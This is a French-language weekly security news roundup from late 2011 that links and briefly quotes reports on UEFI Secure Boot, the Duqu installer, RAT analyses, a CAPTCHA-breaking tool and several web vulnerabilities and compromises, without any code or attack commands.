Actus Sécurité Confirmé 2011 S44

=> White Paper: Secure Boot impact on Linux . 28/10/2011. «Last month Steven Sinofsky from Microsoft announced new requirements for manufacturers wanting to ship Windows 8 systems, including a feature called “Secure Boot”. Canonical, together with Red Hat, today publishes a white paper highlighting the implications of these requirements for users and manufacturers (…).»
Source : blog.canonical.com/2011/10/28/white-paper-secure-boot-impact-on-linux/
Billets en relation :
24/10/2011. Trusted Computing 2.1 : www.lightbluetouchpaper.org/2011/10/24/trusted-computing-2-1/
28/10/2011. Uefi secure boot impact on linux [pdf] : ozlabs.org/docs/uefi-secure-boot-impact-on-linux.pdf
28/10/2011. UEFI : une nouvelle bataille du TPM ? : www.cnis-mag.com/uefi-une-nouvelle-bataille-du-tpm.html
31/10/2011. Secure measured boot in Windows 8 : www.jwsecure.com/2011/10/18/secure-measured-boot-in-windows-8/
01/11/2011. Linux Foundation Says UEFI Doesn’t Have to Prevent Other OS Installations : threatpost.com/en_us/blogs/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111

=> Text-Based CAPTCHAs Cracked by Decaptcha Tool. 31/10/2011. «A team of researchers from Stanford University managed to create a tool that deciphers the CAPTCHAs utilized by Wikipedia, eBay, CNN and other popular websites that rely on them to counterattack automated interactions. (…).»
Source : news.softpedia.com/news/Text-Based-CAPTCHAs-Cracked-by-Decaptcha-Tool-231245.shtml
Billets en relation :
31/10/2011. Source : twitter.com/#!/ChadChoron/statuses/131059107972120577
31/10/2011. Text-based CAPTCHA Strengths and Weaknesses CSS2011 by Bursztein, Martin, Mitchell [pdf] : cdn.ly.tl/publications/text-based-captcha-strengths-and-weaknesses.pdf

=> Exposing the Market for Stolen Credit Cards Data. 31/10/2011. «In this intelligence brief, I will expose the market for stolen credit cards data, by profiling 20 currently active and responding gateways for processing of fraudulently obtained financial data (…).»
Source : ddanchev.blogspot.com/2011/10/exposing-market-for-stolen-credit-cards.html

=> Piwik ? 1.5.1 multiple XSS vulnerabilities. 31/10/2011. «Some time ago I discovered a few interesting XSS vulnerabilities in Piwik Open Source Web Analytics software. Thanks to developers, all of those are now fixed in Piwik 1.6. But nonetheless, these are not the usual XSS cases, so I found them interesting enough to publish this (…).»
Source : blog.kotowicz.net/2011/10/piwik-151-multiple-xss-vulnerabilities.html

=> Duqu: Status Updates Including Installer with Zero-Day Exploit Found. 01/11/2011. «The group that initially discovered the original Duqu binaries, CrySyS, has since located an installer for the Duqu threat. Thus far, no-one had been able to recover the installer for the threat and therefore no-one had any idea how Duqu was initially infecting systems. Fortunately, an installer has recently been recovered due to the great work done by the team at CrySyS. (…).»
Source : www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit
Billets en relation :
01/11/2011. Duqu Installer Contains Windows Kernel Zero Day : threatpost.com/en_us/blogs/duqu-installer-contains-windows-kernel-zero-day-110111
01/11/2011. Duqu dropper recovered! : www.crysys.hu/
01/11/2011. Updated whitepaper (version 1.3) Symantec W32_Duqu [pdf] : www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
02/11/2011. The Mystery of Duqu: Part Three : www.securelist.com/en/blog/208193206/The_Mystery_of_Duqu_Part_Three

=> AntiCloud Trojan Reverse Engineering Analysis. 01/11/2011. «In this paper we are going to talk about the Anticloud Trojan, also know as the TrojanDropper:Win32/Bohu.A and B variant. This malware originated in China and was designed to target the Cloud-Based Technology of major Chinese AntiVirus Vendors. For this reason, Bohu has also been called AntiCloud Trojan. This is the first malware to specifically target cloud based technologies and will likely set a trend (…).»
Source : resources.infosecinstitute.com/anticloud-trojan-reversed/

=> Identifier un attaquant qui a triché sur son adresse IP source. 02/11/2011. «À la réunion OARC de Vienne, le 29 octobre 2011, Duane Wessels a présenté un très intéressant (et très technique) exposé « Tracing a DNS reflection attack » (voir ses transparents). L’exposé présente l’analyse d’une attaque déni de service utilisant les serveurs DNS de la racine. Son originalité est la découverte d’une méthode pour identifier l’origine de l’attaquant, alors même que ce dernier met des adresses IP mensongères dans ses paquets (…).»
Source : www.bortzmeyer.org/identifier-spoofer.html
Billets en relation :
29/10/2011. Tracing a DNS Reflection Attack Oct2011 Wessels : www.dns-oarc.net/files/workshop-201110/tracing-dns-reflection.pdf

=> FINCEN.GOV – Financial crimes enforcement network compromised. 03/11/2011. «Il s’agit d’un BlackHole Exploit Kit (…).»
Source : internetpol.fr/wup/?fincen.gov+-+Financial+Crimes+Enforcement+Network+Compromised#6b5d09859e0d63bf1e6414274821c327

=> Made in the Czech Republic: a PHP Autorun worm. 03/11/2011. «The Czech text above is displayed by the worm inside a console window and translates to: “Initializing. This operation can take several minutes. Please wait…”, pretending to be a message from Microsoft. (…) But in this case, the worm is written entirely in PHP and “converted” to a PE file using the Bambalam PHP EXE Compiler/Embedder. (…).»
Source : blog.eset.com/2011/11/03/made-in-the-czech-republic-a-php-autorun-worm
Billets en relation :
03/11/2011. Win32/AutoRun.PSW.Agent.E (aka PHP Autorun worm) VT result 14/43 : twitter.com/#!/2gg/statuses/132156164606672896

=> Poison Ivy RAT Still Giving Users a Rash. 03/11/2011. «The Poison Ivy malware kit is old. It was first seen in 2005, which makes it about 762 years old in Internet years. But that doesn’t mean it’s no longer useful, as evinced by the data collected by Microsoft in a new report on the tool, which shows that it is still in active use and is turning up on thousands of infected PCs (…).»
Source : threatpost.com/en_us/blogs/poison-ivy-rat-still-giving-users-rash-110311
Billets en relation :
01/11/2011. MMPC – Threat Report: Poison Ivy Oct2011 [pdf] : download.microsoft.com/download/E/1/5/E1552019-2022-4D7D-A001-044D5AE9251D/MMPC%20Threat%20Report%20-%20Poison%20Ivy.pdf
01/11/2011. Poison and EyeStye, by the numbers : blogs.technet.com/b/mmpc/archive/2011/11/01/poison-and-eyestye-by-the-numbers.aspx

=> Malware Analysis: Dark Comet RAT. 04/11/2011. «In this blog post I will take a look at a RAT called Dark Comet. I will run through the capabilities provided by the tool, examine the associated network traffic, identify the encryption algorithm and show how the key can be identified with a little analysis of an infected host. (…).»
Source : www.contextis.co.uk/research/blog/darkcometrat/

=> Analysis of a Real JBOSS Hack. 05/11/2011. «This is an analysis of a recent attack observed on a on a large enterprise network. The attackers compromised multiple servers via JBOSS JMX console vulnerabilities (…).»
Source : blog.9bplus.com/analysis-of-jboss-hack-documented-attack

Vous pourriez aussi aimer...

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Notifiez-moi les commentaires à venir via email. Vous pouvez aussi vous abonner sans commenter.